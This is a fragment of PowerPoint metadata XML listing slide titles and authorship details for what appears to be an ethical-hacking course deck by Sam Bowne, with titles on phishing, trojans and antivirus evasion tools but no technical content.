      <vt:lpstr>IE 7 on Win Server 2008</vt:lpstr>
      <vt:lpstr>IE 7 on Win Server 2008</vt:lpstr>
      <vt:lpstr>IE 7 on Win Server 2008 FAILS</vt:lpstr>
      <vt:lpstr>CNIT 124: Advanced Ethical Hacking</vt:lpstr>
      <vt:lpstr>Spear-Phishing Attacks</vt:lpstr>
      <vt:lpstr>Many Attack Options</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Gmail Blocks It</vt:lpstr>
      <vt:lpstr>Web Attacks</vt:lpstr>
      <vt:lpstr>Web Attack Options</vt:lpstr>
      <vt:lpstr>Attack Explanations</vt:lpstr>
      <vt:lpstr>Broken in Kali 2</vt:lpstr>
      <vt:lpstr>CNIT 124: Advanced Ethical Hacking</vt:lpstr>
      <vt:lpstr>Trojans</vt:lpstr>
      <vt:lpstr>AV</vt:lpstr>
      <vt:lpstr>Encoding</vt:lpstr>
      <vt:lpstr>Cross-Compiling</vt:lpstr>
      <vt:lpstr>Encrypting with Hyperion</vt:lpstr>
      <vt:lpstr>Veil-Evasion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CNIT 127: Exploit Development  Ch 1: Before you begin</dc:title>
  <dc:creator>Sam Bowne</dc:creator>
  <cp:lastModifiedBy>Sam Bowne</cp:lastModifiedBy>
  <cp:revision>134</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-08-26T22:11:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-10-28T22:25:09Z</dcterms:modified>
</cp:coreProperties>
</file>